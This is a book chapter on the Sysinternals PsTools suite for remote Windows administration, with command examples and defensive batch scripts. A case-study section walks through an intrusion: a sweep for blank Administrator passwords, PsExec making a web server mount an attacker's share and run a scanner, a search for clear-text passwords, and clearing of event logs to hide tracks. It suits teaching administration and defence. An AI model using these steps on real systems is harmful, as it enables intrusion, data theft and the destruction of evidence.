| < Day Day Up > |
|
The PsTools suite falls into the gray area between enumeration and full-system access. These tools are developed by Mark Russinovich of SysInternals and are available at http://www.sysinternals.com/ntw2k/freeware/pstools.shtml. The enum and Winfingerprint tools rely on the mighty NULL IPC$ session, but the PsTools require user credentials for some options. Nevertheless, this collection of tools turns an open NetBIOS port into a remote command execution heyday.
Instead of describing the tools in alphabetical order, we’ll start with the least innocuous and work up to the most versatile. A Windows administrator tool kit should contain these tools because they greatly simplify remote administration.
But first, here are some prerequisites for using these tools:
You must have proper user credentials. The greater functionality of these tools requires greater access. This isn’t a problem for system administrators.
The “Server” service must be started on the target system. The “NetLogon” service helps pass credentials across the domain.
The “RemoteRegistry” service is used for certain functions such as PsInfo’s hotfix enumeration.
The IPC$ share must be available.
In an environment where administration relies heavily on the GUI, the left mouse button, and Terminal Services, this suite removes an enormous amount of stress from the whole affair.
Caution | During remote administration, your username and password are flying across the network! If you’re highly concerned about sniffing attacks, make sure that your Windows 2000 and XP servers are using NTLMv2. This is a fault of the underlying Windows authentication scheme, not the PsTools. Check out Chapter 9 for more information on Windows passwords. |
PsTools consists of 12 different utilities that truly simplify administration of large networks. Remote access using Terminal Services does help, but these tools can be an integral part of automated scripts that collect log files, list active users, or run arbitrary commands across dozens of systems.
PsFile allows you to list files on one host that are in use by another host. It mirrors the functionality of the built-in net file command. This is useful for debugging file shares and tracking unauthorized file system access. The following output is shortened for the sake of brevity:
C:\>psfile.exe Files opened remotely on GOBLYNSWOOD: [23] D:\downloads\secretplans.txt User: ORC Locks: 0 Access: Read C:\>net file ID Path User name # Locks -------------------------------------------------------------------- 23 D:\downloads\secretplans.txt ORC 0 The command completed successfully.
We can tell that user ORC is viewing a text file called secretplans.txt. This tool doesn’t reveal from where ORC is accessing the file, so it isn’t very helpful as a forensic tool; that’s a job for netstat. At first, the information appears redundant between the two commands. The –c option works the same way as the /close option to net file. It closes a connection based on the ID (in boldface in the previous example):
C:\>psfile.exe 23 –c Closed file D:\downloads\secretplans.txt on GOBLYN.
Again, there doesn’t seem to be a real advantage over the net utility. However, every PSTool works over a remote connection. The usage is the same, with the addition of the user credentials on the command line.
C:\>psfile.exe \\192.168.0.176 –u Administrator –p IM!secure Files opened remotely on 192.168.0.176: [32] \PIPE\srvsvc User: ADMINISTRATOR Locks: 0 Access: Read Write
If you run psfile against your localhost and specify its IP address, you’ll see that it opens a connection to the server service.
Note | Just about every PsTool accepts the \\RemoteHost –u UserName –p password options, even if the tool’s command-line help (/h) doesn’t explicitly state it. |
Don’t accuse the PsTools of obscure naming conventions. PsLoggedOn displays the users who are logged on to a system, whether through the console, a file share, or another remote method:
C:\>psloggedon.exe Users logged on locally: <Unknown> NT AUTHORITY\LOCAL SERVICE <Unknown> NT AUTHORITY\NETWORK SERVICE 3/10/2002 11:23:49 AM GOBLYNSWOOD\pyretta <Unknown> NT AUTHORITY\SYSTEM Users logged on via resource shares: 3/12/2002 12:04:12 AM (null)\ORC
From a defense perspective, the list of users logged on via resource shares can be especially helpful to administrators. You may wish to schedule tasks that check sensitive systems such as domain controllers, web servers, or the finance department’s database. You could rely on the system’s event logs, but a malicious user could erase them. Having another copy from the scheduled task provides good redundancy.
From an attacker’s perspective, it may not be prudent to launch buffer overflow attacks or other exploits against systems that have users currently logged onto them.
Renaming the Administrator account to “TeflonBilly” might be fun, but do not consider it a true security measure. With PsGetSid, anyone with a NULL connection can obtain a string called the Security Identifier (SID) for a particular user. The final part of this string contains the Relative Identifier (RID). For the Administrator account, regardless of the account name, the RID is always 500—much like the root user on Unix is always 0. The Guest account is always 501. These two RIDs never change.
C:\>psgetsid.exe \\192.168.0.176 -u Administrator –p IM!secure Orc SID for 192.168.0.176\\Orc: S-1-5-21-1454471165-484763869-1708537768-501
Tip | When targeting the “Administrator,” always verify that the account has a SID that ends in –500. Otherwise, you know that the account has been renamed. |
A SID request does not have to target a user. PsGetSid can enumerate other objects such as the computer and user groups:
C:\>psgetsid.exe \\192.168.0.176 -u Administrator –p IM!secure goblynswood SID for 192.168.0.176\\goblynswood: S-1-5-21-1454471165-484763869-1708537768 C:\>psgetsid.exe \\192.168.0.176 -u Administrator –p IM!secure "Power Users" SID for 192.168.0.176\\goblynswood: S-1-5-32-547
Alone, this type of information is not particularly useful, but when cross-referenced with user RIDs from SAM files or other sources, it fills a large part of the domain’s authentication structure.
Operating system, uptime (based on deduction from the event logs), system root, install date, blah, blah, blah—the data almost sounds interesting. Do not mistake PsInfo for a fluff tool. It returns useful data about the system. And, remember, it does so remotely!
PsInfo 1.34 - local and remote system information viewer Copyright (C) 2001-2002 Mark Russinovich Sysinternals - www.sysinternals.com System information for \\ARRAKIS: Uptime: 0 days, 0 hours, 58 minutes, 9 seconds Kernel version: Microsoft Windows XP, Uniprocessor Free Product type: Professional Product version: 5.1 Service pack: 1 Kernel build number: 2600 Registered organization: Registered owner: Michael Shema Install date: 08/11/2002, 22:26:38 Activation status: Activated IE version: 6.0000 System root: C:\WINDOWS Processors: 1 Processor speed: 665 Mhz Processor type: x86 Family 6 Model 8 Stepping 4, ConnectixCPU Physical memory: 196 MB
As you can see, PsInfo provides a quick method for checking your servers for the latest hotfixes. If you’re running IIS, you should be religiously applying hotfixes. PsInfo pulls hotfix information from the HKLM\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Hotfix registry setting, so some application patches may not appear in this list.
A batch file makes this system enumeration easy:
C:\>for /L %i in (1,1,254) do psinfo \\192.168.0.%i > systeminfo_192.168.0.%i.txt
Notice that we’ve left out the authentication credentials. If you’re going to create a batch file that needs to access remote systems, don’t place the username and password in the batch file. Instead, run the batch file in the context of a domain user with permissions to enumerate this information. The only problem you’ll encounter is difficulty accessing systems that are not part of the domain.
This robust tool enables you to view and manipulate services remotely. The Windows net start and net stop commands tremble in the presence of PsService. With no command-line options, PsService returns a list of every service installed on the system. The following output has been shortened for brevity, but it includes complete descriptions for two services:
C:\>psservice.exe SERVICE_NAME: inetd DISPLAY_NAME: CYGWIN inetd (null) TYPE : 10 WIN32_OWN_PROCESS STATE : 1 STOPPED (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 1077 (0x435) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 SERVICE_NAME: SharedAccess DISPLAY_NAME: Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS) Provides network address translation, addressing, name resolution and/or intrusion prevention services for a home or small office network. TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0
Service information, regardless of whether or not the service is currently running, indicates the role of a system, security software installed, and possibly its relative importance on a network. A server that backs up the PDC will have a backup service running, and an e-mail server might have an anti-virus server running. Even so, PsService also provides control over the services. Specify one of the following commands to manipulate a service:
PsService “Cmd” Option | Description |
---|---|
query | Queries the status of a service |
config | Queries the configuration |
start | Starts a service |
stop | Stops a service |
restart | Stops and then restarts a service |
pause | Pauses a service |
cont | Continues a paused service |
depend | Enumerates the services that depend on the one specified |
find | Searches for an instance of a service on the network |
After the command, specify the service to be affected. For example, here’s how to start IIS on a remote computer type (assuming you are logged in to the domain as an administrator):
C:\>psservice.exe \\192.168.0.39 start w3svc
You could also stop, restart, pause, or continue the service. The config command differs slightly from the query command, which provides the information when PsService runs without options. The config command returns information about the actual program the service executes:
C:\>psservice.exe config inetd SERVICE_NAME: inetd (null) TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : d:\cygwin\usr\sbin\inetd.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : CYGWIN inetd DEPENDENCIES : SERVICE_START_NAME: LocalSystem
Finally, the find command can be used to hunt down services running on a network. In a way, it can be a roundabout port scanner. For example, to find hosts in a domain that are running Terminal Services, look for the termservice service:
C:\>psservice.exe find termservice Found termservice on: \\ZIGGURAT \\GOBLYNSWOOD
Use this in conjunction with a port scanner to identify rogue IIS installations on your network.
When your Unix friends make fun of the Windows process list commands, mention PsList and you might see a few knowing winks or a little jealousy. PsList displays a process list for the local or remote system. The –d, –m, and –x options show information about threads, memory, and a combination of the two, respectively. However, you will probably need to use only a plain pslist:
C:\>pslist.exe Process information for GOBLYNSWOOD: Name Pid Pri Thd Hnd Mem User Time Kernel Time Elapsed Time Idle 0 0 1 0 16 0:00:00.000 3:57:29.219 0:00:00.000 System 8 8 39 319 216 0:00:00.000 0:00:11.536 0:00:00.000 SMSS 152 11 6 33 560 0:00:00.210 0:00:00.741 4:27:11.031 CSRSS 180 13 10 494 3560 0:00:00.650 0:01:30.890 4:26:59.084 WINLOGON 200 13 17 364 3256 0:00:00.230 0:00:01.081 4:26:55.879 SERVICES 228 9 30 561 5640 0:00:01.542 0:00:03.535 4:26:48.058 LSASS 240 9 14 307 520 0:00:00.260 0:00:00.230 4:26:48.028 svchost 420 8 9 333 3748 0:00:00.150 0:00:00.150 4:26:41.839 spoolsv 452 8 12 166 3920 0:00:00.070 0:00:00.160 4:26:41.088
You can also gather information about a specific process name or process ID by calling it on the command line. For example, to see how much of your system resources Internet Explorer has chewed away try this:
C:\>pslist.exe iexplore Process information for GOBLYNSWOOD: Name Pid Pri Thd Hnd Mem User Time Kernel Time Elapsed Time IEXPLORE 636 8 17 805 26884 0:00:14.711 0:00:17.154 4:38:27.694 IEXPLORE 1100 8 28 1054 27980 0:00:24.375 0:00:40.888 4:36:25.388
Tip | A handful of password-grabbing utilities require the process ID (PID) of the LSASS program. PsList is the perfect way to find it. |
The –s and –r options really come in handy for monitoring important servers or even debugging code. The –s puts PsList into Task Manager mode. In other words, it performs a continuous refresh until you press ESC—much like the Unix top command. The –r sets the refresh rate in seconds. For example, you can monitor the IIS service process on a web server every 10 seconds:
C:\>pslist.exe -s -r 10 inetinfo.exe
The –t option displays each process and its threads in a tree format, making it easier to visualize the process relationships on the system. Here’s an abbreviated output that shows the system threads:
C:\>pslist.exe –t Process information for GOBLYNSWOOD: Name Pid Pri Thd Hnd VM WS Priv Idle 0 0 1 0 0 16 0 System 8 8 39 323 1668 216 24 SMSS 152 11 6 33 5248 560 1072 CSRSS 180 13 10 502 22700 3576 1512 WINLOGON 200 13 17 364 35812 3252 5596 SERVICES 228 9 31 563 33748 5652 2772 svchost 420 8 9 333 22624 3748 1528 MDM 1420 8 3 96 25996 2640 924 Avsynmgr 556 8 4 139 28024 2708 1460 VSStat 896 8 2 112 26376 2664 1376 vshwin32 956 8 7 219 54220 6468 3908 WebScanX 1036 8 3 194 40020 6052 4628 Avconsol 976 8 2 112 28500 2640 1484 svchost 592 8 33 449 43592 8084 3364 LSASS 240 9 14 307 28080 864 2344 explorer 1200 8 17 468 99580 4460 11912
As you can list a process, so you can kill it (or suspend it if you’re feeling gracious). The PsKill tool takes either a process name or ID as an argument. If you rely on the PID, you’ll need to use PsKill in conjunction with PsList. On the other hand, specifying the process by name might kill more processes than you intended. Both methods are susceptible to the “oops” vulnerability—mistyping a PID and accidentally killing the wrong process.
C:\>pslist.exe | findstr /i notepad notepad 1764 8 1 30 1728 0:00:00.020 0:00:00.020 0:00:07.400 notepad 1044 8 1 30 1724 0:00:00.020 0:00:00.020 0:00:05.077 notepad 1796 8 1 30 1724 0:00:00.010 0:00:00.020 0:00:03.835 C:\>pskill.exe 1764 process #1764 killed C:\>pskill.exe notepad 2 processes named notepad killed.
Caution | Be aware of killing processes by name. PsKill matches every process, not just the first one it encounters. It does not honor wildcards, such as the asterisk (*). |
PsSuspend works in the same manner. Specify a process name or ID after the command to suspend that process:
C:\>pssuspend.exe 1116 Process 1116 suspended.
Use the –r option to resume a process:
C:\>pssuspend.exe -r 1116 Process 1116 resumed.
Note | Remember that these tools work remotely, but they require user authentication. An open NetBIOS port doesn’t expose the entire system to compromise. However, there is a problem with an open NetBIOS port and a blank administrator password (we’ve seen plenty of these). Use the PsTools to tighten and audit your network. |
The event log contains a wealth of information about system health, service status, and security. Unfortunately, the awkwardness of the Event Log Viewer typically precluded administrators from running quick log audits. Unlike the Unix world, where the majority of logs are in text format, the Windows event logs are a binary puzzle. The advent of PsLogList makes two things possible: Logfiles can be extracted to a text format and parsed into spreadsheets or other formats, and logfiles can be retrieved remotely to consolidate, back up, and preserve their content.
PsLogList v2.31 - local and remote event log viewer Copyright (C) 2000-2003 Mark Russinovich Sysinternals - www.sysinternals.com PsLogList dumps event logs on a local or remote NT system. Usage: psloglist [\\RemoteComputer [-u Username [-p Password]]] [-s [-t delimiter]] [-n # | -d #][-c][-x][-r][-a mm/dd/yy][-b mm/dd/yy] [-f filter] [-i ID] [-o event source] [-l event log file] <event log>
The following table details the available options:
PsLogList Option | Description |
---|---|
-a <mm/dd/yy> | Dumps records timestamped after specified date. |
-b <mm/dd/yy> | Dumps records timestamped before specified date. |
-c | Clears event log after displaying. |
-d <digit(s)> | Displays only records from previous n days. |
-f <e|I|w> | Filters event types, using starting letter (for example, -f we to filter warnings and errors). |
-i <Event ID> | Shows only events with the specified ID. |
-l | Dumps the contents of the specified saved event log file. |
-n <digit(s)> | Displays only n most recent records. |
-o <source> | Shows only records from the specified event source (for example, -o cdrom). |
-p | Specifies password for username. |
-r | Dumps log from least recent to most recent. |
-s | Lists records on one line each with delimited fields, which is convenient for string searches. |
-t <character> | Default delimiter for the -s option is a comma; can be overridden with the specified character. |
-u | Specifies optional username for login to remote computer. |
-x | Dumps extended data. |
<eventlog> | Specifies event log to dump. Default is system. If the -l switch is present, then the event log name specifies how to interpret the event log file. |
PsLogList displays the logfile contents in a long format or a consolidated, comma- delimited manner. By default, PsLogList returns the long format of the system log:
C:\>psloglist PsLogList v2.31 - local and remote event log viewer Copyright (C) 2000-2003 Mark Russinovich Sysinternals - www.sysinternals.com System log on \\ARRAKIS: [549] Service Control Manager Type: INFORMATION Computer: ARRAKIS Time: 25/07/2003 22:27:10 ID: 7036 The WMI Performance Adapter service entered the stopped state.
Output in a comma-delimited format is obtained by the –s option. Once more, the example has been shortened for clarity:
C:\>psloglist -s PsLogList v2.31 - local and remote event log viewer Copyright (C) 2000-2003 Mark Russinovich Sysinternals - www.sysinternals.com System log on \\ARRAKIS: 551,System,Tcpip,INFORMATION,ARRAKIS,Fri Jul 25 23:26:46 2003,4201, None, The system detected that network adapter \DEVICE\TCPIP_{056213EA- 3E98-4CBB-8997-5145022A8FDC} was connected to the network, and has initiated normal operation over the network adapter.
Any of the three event logs—application, security, or system—can be viewed:
C:\>psloglist –s security PsLogList v2.31 - local and remote event log viewer Copyright (C) 2000-2003 Mark Russinovich Sysinternals - www.sysinternals.com Security log on \\ARRAKIS: 2017,Security,Security,AUDIT SUCCESS,ARRAKIS,Mon Jul 28 10:36:12 2003, 520,SYSTEM\NT AUTHORITY,The system time was changed. Process ID: 1176 Process Name: C:\WINDOWS\CNTX\VPCSRVC.EXE Primary User Name: ARRAKIS$ Primary Domain: WORKGROUP Primary Logon ID: (0x0,0x3E7) Client User Name: ARRAKIS$ Client Domain: WORKGROUP Client Logon ID: (0x0,0x3E7) Previous Time: 10:36:12 28/07/2003 New Time: 10:36:12 28/07/2003
The –f option enables you to filter events based on one of five types: Warning (w), Information (i), Errors (e), Audit Success, and Audit Failure. (The letters in parentheses are abbreviations that PsLogList accepts.) The two audit types apply only to the security log and must be wrapped in quotation marks:
C:\>psloglist.exe –s -f "Audit Success" Security Security_successes.log
Use PsLogList to help maintain and follow your network’s audit policy. Although this tool does not toggle event log settings, use it to coordinate logs and generate daily, weekly, or monthly reports about your network. Proper log review will not only catch malicious users, but it also helps maintain a healthy network.
Caution | The –c option will actually clear the logfile after it has been dumped. Use this option with care, as you may inadvertently erase logfiles that have not yet been backed up. |
C:\>psloglist.exe –c Application ...output truncated... Application event log on GOBLYNSWOOD cleared. C:\>psloglist.exe Application Application log on \\GOBLYNSWOOD: No records in Application event log on GOBLYNSWOOD.
Note | An attacker could use the –c option to clear event logs to hide her tracks. |
The –a and –b options retrieve events after and before the supplied date in the "mm/dd/yy" format. For example, here’s how to view the previous day’s security events (using 02/09/02 as the current day):
C:\>psloglist.exe -a 02/08/02 -b 02/09/02 Security
Finally, PsLogList reads the binary event log files from any system. Supply the filename to the –l option. In this instance, PsLogList deduces the log type (application, security, system):
C:\>psloglist.exe –l Security.evt
The latest version of PsLogList introduces two new options. The first option filters events with a specific event ID (-i). The second option filters events with a specific event source (-o). Thus, you can look for specific events with strong security implications such as failed logon/logoff events in the security log:
C:\>psloglist -s security -i 529 PsLogList v2.31 - local and remote event log viewer Copyright (C) 2000-2003 Mark Russinovich Sysinternals - www.sysinternals.com Security log on \\ARRAKIS: 1962,Security,Security,AUDIT FAILURE,ARRAKIS,Fri Jul 25 21:39:35 2003, 529,SYSTEM\NT AUTHORITY,Logon Failure: Reason: Unknown user name or bad password User Name: Muaddib Domain: ARRAKIS Logon Type: 2 Logon Process: Advapi Authentication Package: Negotiate Workstation Name: ARRAKIS 1919,Security,Security,AUDIT FAILURE,ARRAKIS,Tue Jul 22 16:13:58 2003, 529,SYSTEM\NT AUTHORITY,Logon Failure: Reason: Unknown user name or bad password
Or you can check for errors from specific sources in the application or system logs:
C:\>psloglist -s system -o dhcp PsLogList v2.31 - local and remote event log viewer Copyright (C) 2000-2003 Mark Russinovich Sysinternals - www.sysinternals.com System log on \\ARRAKIS: 469,System,Dhcp,WARNING,ARRAKIS,Mon Jul 21 13:47:24 2003,1007,None, Your computer has automatically configured the IP address for the Network Card with network address 0003FFABA4F6. The IP address being used is 169.254.235.60. 468,System,Dhcp,WARNING,ARRAKIS,Mon Jul 21 13:47:19 2003,1003,None, Your computer was not able to renew its address from the network (from the DHCP Server) for the Network Card with network address 0003FFABA4F6. The following error occurred: The semaphore timeout period has expired. . Your computer will continue to try and obtain an address on its own from the network address (DHCP) server.
Sources are easily identified from the “Source” column when you launch the GUI-based Event Viewer (eventvwr.exe).
PsExec ranks as the most useful of the PsTools suite. It executes commands on the remote system, even going as far as uploading a program if it does not exist on the target system. Unlike other remote tools such as the Windows clone of Unix’s rexec command, with PsExec you do not need to install support DLLs or special server applications. However, you must have access to the ADMIN$ share and proper credentials for this tool to work.
PsExec assumes you want to execute the command on a remote server, so the ComputerName argument is mandatory (you can always specify the –u and –p options for the username and password):
C:\>psexec.exe \\192.168.0.43 cmd /c dir
Be sure to keep track of your command paths. By default, PsExec works from the %SYSTEMROOT%\System32 directory. Here are some other examples:
C:\>psexec.exe \\192.168.0.43 ipconfig /all C:\>psexec.exe \\192.168.0.43 net use * \\10.2.13.61\backups Rch!ve /u:backup C:\>psexec.exe \\192.168.0.43 c:\cygwin\usr\sbin\sshd
If the program name or path contains spaces, wrap it with double quotes.
If the program doesn’t exist on the target system, use the –c option (or –f). This copies it from the system running PsExec to the \\ComputerName’s \System32 directory. The –f overwrites the file if it already exists. This example places fscan, a command-line port scanner, on the target, and then launches a port scan from that system against the class C network:
C:\>psexec.exe \\192.168.0.43 –c fscan.exe –q –bp1-10001 –o targets.txt 192.168.0.1-192.168.0.255
Conceivably, you could use –c to upload an entire tool kit to the target. If you suspect a file already exists and you want to overwrite it only with a newer version, you can supply the –v option in conjunction with–c. The –v option instructs PsExec only to copy the file if the version number is higher or the date stamp is newer. A file’s version number can be found by right-clicking the binary and selecting Properties.
The final options control how the remote process runs. To detach the process and let it run in the background, use –d (think daemon mode in Unix). Use –s to have the command run in a System account. The –i option enables interactive access, such as FTP or other commands that prompt for a password.
You can also control how the remote application executes by setting its priority (-low, -belownormal, -abovenormal, -high, -realtime) and processors on a multi-CPU machine with the –a option. Specify the processors by number after the –a option, such as –a 1,2 to run on processors 1 and 2 of a four-CPU system.
PsShutdown is the exception to the rule for PsTools expansion. It performs the same functions as the Resource Kit shutdown tool. Both work remotely. You can shut down a server or stop a pending shutdown. The PsShutdown usage is shown here and in the table that follows (yes, it is safe to type psshutdown without options—it will display the usage):
C:\>psshutdown PsShutdown v2.01 - local and remote system shutdown/lock Copyright (C) 2000-2002 Mark Russinovich Sysinternals - www.sysinternals.com usage: psshutdown [-u Username [-p password] [[-s | -r | -k [-t nn][-m "message"] [-f]] -a | -l | -o] [\\computer]
PSShutdown Option | Description |
---|---|
-a | Aborts a shutdown (only possible while countdown is in progress). |
-f | Forces the running applications to close. |
-k | Powers off the computer (reboot if poweroff is not supported). |
-l | Locks the computer. |
-m | Displays message to logged on users. |
-o | Logs off the console user. |
-r | Reboots after shutdown. |
-s | Shuts down without poweroff. |
-t | Specifies countdown in seconds until shutdown (default is 20). |
-u | Specifies optional username for login to remote computer. |
-p | Specifies optional password for username. If you omit this, you will be prompted to enter a hidden password. |
\\computer | Shuts down the remote computer specified. |
There are no catches to using this tool. To shut down a system somewhat ungracefully, use the –f option; it works just like shutdown –c –y from the Resource Kit. Its benefit over the shutdown utility is that PsShutdown includes the –o option to log off the console user forcefully.
Strong firewall rules are increasingly locking down the ports a network makes available to the Internet. Good network architectures place high-risk servers such as web, e-mail, and DNS on network segments segregated from the internal corporate network and the Internet, an area often referred to as the demilitarized zone, or DMZ. However, the corporate network can be hostile to the web servers and databases in a DMZ in many ways. A “war-dialer” might find a user's desktop with PCAnywhere, a wireless drive-by might find a poorly secured access point that offers a Dynamic Host Configuration Protocol (DHCP) address, or a malicious user on the inside may wish to take a peek into the credit cards stored on the databases.
In any case, the NetBIOS ports between the corporate network and the DMZ are most likely open. After all, the concern is for hackers attacking from the Internet, right? Take a look at how the PsTools can pick apart a web farm. First, our attacker is on the corporate network (an IP address in the 10.0.0.x range), accessed from the parking lot with a wireless network information center (NIC). The target network is the web servers and databases on the 192.168.17.x range. A port scan shows only a few open services:
C:\>fscan –p1-1024 192.168.17.1-192.168.17.255 192.168.17.1 139/tcp 192.168.17.1 135/tcp 192.168.17.1 3389/tcp 192.168.17.1 445/tcp 192.168.17.39 80/tcp 192.168.17.39 139/tcp 192.168.17.39 135/tcp 192.168.17.39 445/tcp 192.168.17.148 80/tcp 192.168.17.148 139/tcp 192.168.17.202 445/tcp 192.168.17.239 139/tcp 192.168.17.239 135/tcp 192.168.17.239 445/tcp
It looks like only the web and NetBIOS ports are open; the SQL ports must be blocked by the firewall.
The hacker could run Winfingerprint to find the true Administrator account name in case the system administrators renamed it (SID 500). Here the attacker runs a quick test on the range to locate any systems with a blank Administrator password. It's pointless to try every IP address on the 192.168.17.x network, because many of them are unused. The hosts.txt file contains the IP address or hostname of only the live systems.
C:\>for /F %%h in (hosts.txt) do psinfo –u Administrator –p "" \\192.168.17.%%h > systeminfo_192.168.17.%%h.txt
If any of the commands return successfully, the attacker has discovered an account with a blank password. Note that the attacker targeted the Local Administrator account for each system. In this case, the host at 192.168.17.148 had a blank Administrator password. The PsInfo also listed this hotfix:
SP2SRP1: Windows 2000 Security Rollup Package...
This rollup package means that the most common IIS vulnerabilities have been patched, but that doesn't impede the attack, as command-line access can be gained with PsExec.
The attacker creates a Windows share on her own system, 10.0.0.99, as a drop-off location for information gathered from the web server. Then the attacker uses PsExec to have the web server mount the share:
C:\>psexec –u Administrator –p "" \\192.168.17.148 net use * \\10.0.0.99\tools pass /u:user Drive H: is now connected to \\10.0.0.99\tools. The command completed successfully.
Next, the attacker runs another fscan from the compromised web server. The results should be different because the scan originates behind the firewall (check out Chapter 13 for methods on accessing ports blocked by firewalls):
C:\>psexec –u Administrator –p "" \\192.168.17.148 –c fscan.exe –q –o h:\fscan.output –bp1-65535 192.168.17.0-192.168.17.255
Notice what's happening here. Fscan is being copied to the victim system (-c); the victim system runs fscan and stores the output (-o h:\fscan.output) on the attacker's system. Remember that the previous step mapped the H: drive on the victim system to the attacker's system. Taking a look at the output, fscan has discovered one more service:
192.168.17.202 1433/tcp
The attacker found the database!
Next, the attacker runs PsExec against 192.168.17.202 and collects some basic information. Some of the commands to run include these:
ipconfig /all Determine whether the system is multi-homed. A web server often has two network cards—one for the Internet-facing IP address and another for back-end connections to a database.
netstat –na View current connections and listening services. This is an excellent way to identify other networks. For example, we could port scan an entire Class A network space (10.0.0.0/8) or examine the netstat output and discover connections to specific Class C networks (10.0.35.0/24, 10.0.16.0/24, and so on).
dir /s c:\ Recursive directory listing, repeated for each drive letter. Along with the PsService tool, this identifies what programs are installed. It might also highlight sensitive files such as global.asa, which contain clear-text passwords.
Once all of the data have been pilfered from the server, the attacker clears the logfiles and moves on to the next target:
C:\>psloglist.exe –c Application –u Administrator –p "" \\192.168.17.148 C:\>psloglist.exe –c System –u Administrator –p "" \\192.168.17.148 C:\>psloglist.exe –c Security –u Administrator –p "" \\192.168.17.148
The PsTools seem so basic that you might wonder about their usefulness. Ask yourself what you want to do. The ability to interact remotely with services, logfiles, processes, and the command line is not something to scoff at. In fact, a little bit of ingenuity combined with some short batch files and scheduled tasks can create a moderate IDS. Consider the following scenarios.
Monitor Processes In 2001, a slew of IIS exploits launched cmd.exe shells back to the attacker. Sometimes, cmd.exe was renamed to root.exe.
To deal with this sort of attack, you first set up a hardened Windows system to serve as the master administration server. Then run the following batch file, a.k.a. Windows NT script, to watch for rogue processes (you will need the sleep and tee commands from the Resource Kit or Cygwin):
rem ProcWatch.bat rem usage: procwatch.bat IP address username password :loop pslist \\%1 –u %2 –p%3 cmd | tee procwatch.txt sleep 60 goto :loop
Notice that the batch file accepts the IP address, username, and password from the command line. This ensures that we never write down a password that makes the file universally applicable. Note that the DOS history file on the master server will remember the password. The following Properties dialog box shows how to set the history buffer to zero from the cmd.exe Properties.
You can watch the PsList output in the command screen, or you can run other tools to search the procwatch.txt file automatically for the presence of cmd.exe.
Collect Log Files Another advantage to using PsExec and PsLogList is logfile consolidation. We've already demonstrated how useful PsLogList is for gathering and clearing remote event logs. Web server logfiles require a more scripted approach. You could run scripts on each individual web server that copies logs, or you could run a single script from your master administration server that collects logfiles from all the web servers. In addition to the following two batch files, you need to set up the following:
C:\shares\dropoff\ A directory shared on the master server to which the Guest user has write privileges.
C:\logs\ A directory for storing logfiles. Create subdirectories here named for each web server.
The collection batch file This is the file to run to start the collection process:
rem CollectLogs.bat rem usage: CollectLogs.bat <username> <password> for /F %%h in (webservers.txt) do rotate.bat %%h %1 %2
This is the helper batch file that performs the actual work:
rem rotate.bat rem usage: rotate.bat IP address username password rem Stop the Web Service psservice \\%1 -u %2 -p %3 stop w3svc rem Mount the master's file share for dropping off files psexec \\%1 -u %2 -p %3 net use L: \\master\dropoff plainpass /u:guest rem Copy the files from the web server to the master psexec \\%1 -u %2 -p %3 cmd copy C:\Winnt\System32\LogFiles\W3SVC1\*.log L:\ rem Move the files from the master's dropoff folder to the log folder rem for the web server move C:\shares\dropoff\*.log C:\logs\%1\ rem Disconnect the share psexec \\%1 -u %2 -p %3 net use L: /del rem Restart the Web Service psservice \\%1 -u %2 -p %3 start w3svc
You could run this daily, weekly, or monthly. It leaves the logfiles on the web server but creates copies on your master server. Then you could come up with other scripts to perform automated log reviews.
| < Day Day Up > |
|